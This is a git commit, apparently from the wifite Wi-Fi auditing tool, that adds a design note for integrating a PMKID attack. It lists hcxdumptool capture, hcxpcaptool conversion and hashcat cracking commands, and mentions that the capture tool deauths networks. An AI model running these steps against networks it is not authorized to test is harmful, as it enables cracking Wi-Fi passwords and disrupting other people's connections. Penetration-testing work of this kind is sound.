Added PMKID attack. Simplified attack-loop.

2018-08-15 11:08:12 -07:00
parent 0d44a6bc3d
commit 936230dd50
7 changed files with 371 additions and 81 deletions
--- a/PMKID.md
+++ b/PMKID.md
@@ -0,0 +1,33 @@
+### PMKID Attack
+
+See https://hashcat.net/forum/thread-7717.html
+
+### Steps
+
+1. Start `hcxdumptool` (daemon)
+   * `sudo hcxdumptool -i wlan1mon -o pmkid.pcapng -t 10 --enable_status=1`
+   * Should also use `-c <channel>`, `--filterlist` and `--filtermode` to target a specific client
+   * Could be a new attack type: `wifite.attack.pmkid`
+2. Detect when PMKID is found.
+   * `hcxpcaptool -z pmkid.16800 pmkid.pcapng`
+   * Single-line in pmkid.16800 will have PMKID, MACAP, MACStation, ESSID (in hex).
+3. Save `.16800` file (to `./hs/`? or `./pmkids/`?)
+   * New result type: `pmkid_result`
+   * Add entry to `cracked.txt`
+4. Run crack attack using hashcat:
+   * `./hashcat64.bin --force -m 16800 -a0 -w2 path/to/pmkid.16800 path/to/wordlist.txt`
+
+### Problems
+
+* Requires latest hashcat to be installed. This might be in a different directory.
+   * Use can specify path to hashcat? Yeck...
+   * % hashcat -h | grep 16800
+   * 16800 | WPA-PMKID-PBKDF2
+* If target can't be attacked... we need to detect this failure mode.
+   * Might need to scrape `hcxdumptool`'s output
+   * Look at `pmkids()` func in .bashrc
+   * hcxpcaptool -z OUTPUT.16800 INPUT.pcapng > /dev/null
+   * Check OUTPUT.16800 for the ESSID.
+* Wireless adapter support is minimal, apparently.
+* hcxdumptool also deauths networks and captures handshakes... maybe unnecessarily
+